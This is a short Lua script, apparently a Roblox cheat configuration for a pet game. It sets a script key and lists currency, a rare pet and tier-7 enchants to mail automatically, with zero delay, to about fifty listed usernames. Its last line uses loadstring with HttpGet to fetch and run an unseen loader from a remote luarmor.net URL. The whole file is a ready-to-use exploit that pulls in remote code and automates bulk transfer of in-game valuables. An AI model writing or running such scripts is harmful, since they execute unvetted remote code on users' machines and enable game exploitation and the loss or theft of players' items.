script_key = "PBgqFQESzNhuTfgQatfaWcLbqQSoMvXK";
_G.DISABLE_OVERLAY = true
_G.GDRY_RUN = false
_G.GMAIL_ITEMS = {
["Diamonds"] = {Class = "Currency", Id = "Diamonds", Amount = "3m"},
["Blooming Axolotl"] = {Class = "Pet", Id = "Blooming Axolotl", Amount = 115, IsGold = false, IsRainbow = true, IsShiny = false},
["Strong Pets"] = {Class = "Enchant",Id = "Strong Pets",Tier = 7, Amount = 1},
["Lucky Eggs"] = {Class = "Enchant",Id = "Lucky Eggs",Tier = 7, Amount = 1},
["Criticals"] = {Class = "Enchant",Id = "Criticals",Tier = 7, Amount = 1},
["Treasure Hunter"] = {Class = "Enchant",Id = "Treasure Hunter",Tier = 7, Amount = 1},
["Tap Power"] = {Class = "Enchant",Id = "Tap Power",Tier = 7, Amount = 1},
}
_G.GMAIL_RECEIVERS = {
"NexusStealth_Craft20",
"sproutAbyss2015",
"BlizzarddawnComet",
"MrsfredSizzle",
"ItsAmelia_Kite",
"MrsRippleWarden",
"MrsCharlotteByte",
"FrankRocket52",
"MiazestPh0enix",
"ItsDylanFury",
"TheRealToxicSapphire",
"NexusHunterSonic",
"windGl0wL00m",
"JoltsproutJester2003",
"chrisFrostSpark",
"GabrielsplashTalon47",
"MrsTomVectorHalo",
"stone_Tempest",
"AubreyScorchTempest",
"NexusPenelopeDawndaz",
"NexusDaveSparkly",
"TheRealrachelArrow20",
"TheRealWarden_Chase",
"Radiant_Shine2023",
"ItsJacobVelvet",
"NatalieMoonbeamDynam",
"JesterQuasar14",
"JosiahMaxBounce",
"PetterClaw2024",
"CatalystWardensparkl",
"Natalie_Vibe2005",
"ItsEmber_Phantom",
"TheRealVict0riaSt0rm",
"NexusHero_Craft2002",
"ItsBac0nKnight",
"NexusEzraIvory",
"ItsRoseknoll79",
"TheRealQueenfern2021",
"AmeliaFusionLava",
"Madis0nCraft",
"TheRealPenelopeWobbl",
"NexuslauraOnyxGobble",
"PatrickNexusHyper202",
"Sonic_Dynamo",
"adamOpal201897",
"MRSBELLA_Paladin2013",
"TheRealElijah_gleam3",
"BlockZigzag2019",
"Alancrisp2022",
}

_G.GMAIL_DELAY  = 0
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f386eb537ee7b37a8f0ad37fe6dbc60.lua"))()
